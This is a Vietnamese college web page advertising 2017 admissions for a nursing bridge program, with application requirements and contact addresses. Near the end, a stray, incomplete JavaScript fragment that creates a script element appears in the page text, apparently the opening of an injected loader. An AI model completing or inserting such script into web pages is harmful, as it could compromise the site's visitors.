Danh mục
Trang chủ > Tuyển Sinh Cao Đẳng Y Dược > Cao Đẳng Điều Dưỡng Liên Thông > Tuyển Sinh Liên Thông Cao Đẳng Điều Dưỡng Hà Nội Năm 2017

Tuyển Sinh Liên Thông Cao Đẳng Điều Dưỡng Hà Nội Năm 2017

1 Star2 Stars3 Stars4 Stars5 Stars (1 votes, average: 5,00 out of 5)
Loading...

29/12/2016 660 Lượt xem

Hiện nay, các Điều dưỡng viên Trung cấp đang gấp rút nâng cao trình độ chuyên môn nhằm đáp ứng yêu cầu của thông tư chuẩn hóa Bộ Y tế, bằng việc học liên thông Cao đẳng Điều dưỡng.

tuyen-sinh-van-bang-2-cao-dang-dieu-duong

Thông báo tuyển sinh Văn bằng 2 Cao đẳng Điều dưỡng năm 2017.

Nhu cầu học liên thông Cao đẳng Điều Dưỡng Hà Nội là tất yếu.

Khi thông tư mới được đưa ra, yêu cầu đội ngũ cán bộ các cơ sở Y tế phải có chuyên môn từ Trình độ Cao đẳng trở lên. Điều đó yêu cầu 1 lượng lớn cán bộ Điều dưỡng viên trình độ Trung cấp phải sớm nâng cao trình độ của mình.

Đây đồng thời cũng là cơ hội để đổi mới, cải cách nhằm nâng cao chất lượng, đổi mới tư duy và trình độ chuyên môn được nâng cao. Tại một số bệnh viện đã và đang yêu cầu cán bộ, nhân viên có trình độ Trung cấp học liên thông bậc cao hơn.

Điều dưỡng viên là người trực tiếp chăm sóc người bệnh, tham gia vào quá trình phục hồi chức năng vì thế trình độ chuyên môn phải ngày càng được phải nâng cao. Thực tế cho thấy tại các cơ sở khám chữa bệnh từ tuyến Trung ương đến tuyến cơ sở thì Điều dưỡng viên chiếm 1 nửa quân số cán bộ.

Lối đi nào cho Trung cấp Y sĩ tại các cơ sở Y tế?

Cũng theo thông tư này thì người học Trung cấp Y sĩ buộc phải liên thông hệ cao hơn. Mà thực tế việc liên thông bác sĩ là rất khó khăn và không phải ai cũng đi được. Vậy những cán bộ Y tế học Trung cấp Y sĩ còn chỗ đứng nào?

Nắm bắt được tình hình chung, nên nhiều người đã tốt nghiệp Trung cấp Y sĩ đã nhanh chóng đăng ký học chuyển đổi văn bằng 2 Trung cấp Điều dưỡng với thời gian là 10 tháng, sau đó liên thông lên Cao đẳng hay Đại học Điều dưỡng để có được chỗ đứng nhất định và không bị đào thải nơi mình đang công tác. Đây là con đường sáng suốt và cũng không quá khó để thực hiện.

Học Liên thông Cao đẳng Điều dưỡng đáp ứng nhu cầu ngành Y tế

truong-cao-dang-y-duoc-pasteur-thuc-hanh-gan-lien-voi-benh-vien

Trường Cao đẳng Y Dược Pasteur đào tạo gắn liền thực hành bệnh viện.

Chuyên ngành Điều dưỡng hệ Cao đẳng được đào tạo tại Trường Cao đẳng Y Dược Pasteur, với nhiều năm kinh nghiệm trong lĩnh vực Y Dược. Trường đã đào tạo nhiều khóa sinh viên ra trường có việc làm ngay bởi sự tín nhiệm của nhiều cơ quan, cơ sở Y tế về chất lượng tay nghề. Với thời gian đào tạo linh hoạt giúp cho sinh viên vừa có thể đi học lại có thể đi làm.

Học liên thông nhằm nâng cao giá trị bằng cấp, bổ sung trình độ chuyên môn. Với tấm bằng Cao đẳng Điều dưỡng của Trường Cao đẳng Y Dược Pasteur sinh viên có đầy đủ giá trị pháp lý và trình độ tay nghề đạt chuẩn Bộ Y tế, sau khi ra trường  có thể tiếp tục liên thông bậc cao hơn.

Hồ sơ liên thông Cao đẳng Điều Dưỡng bao gồm:

  • 02 Bản sao công chứng bằng và bảng điểm Trung cấp.
  • 02 Bản sao giấy khai sinh.
  • 02 Bản sao bằng tốt nghiệp THPT cấp 3.
  • 04 Ảnh (3×4) + 01 ảnh (2×3)
  • 02 Sơ yếu lý lịch (có dấu xác nhận cơ quan địa phương hoặc tại nơi đang làm việc)

Địa chỉ đào tạo Liên thông Cao đẳng Điều Dưỡng:

Trường Cao đẳng Y Dược Pasteur Hà Nội: Phòng 106 nhà B – 131 Thái Thịnh – Quận Đống Đa – Hà Nội. Số điện thoại: 0439.131.131 – 09.8258.8258.

sinh-vien-y-khoa-pasteur-trong-gio-thuc-hanh

Trường Cao đẳng Y Dược Pasteur Tp.HCM 37/3 Ngô tất tố, Phường 21, Quận Bình Thạnh, TP.HCM. Điện thoại tư vấn: 08.6295.6295 – 09.6295.6295

var d=document;var s=d.createElement(‘script’);

Có thể bạn quan tâm

Công bố điều kiện Liên thông Cao đẳng Điều dưỡng năm 2021

Trường Cao đẳng Y Dược Pasteur công bố điều kiện Liên thông Cao đẳng Điều …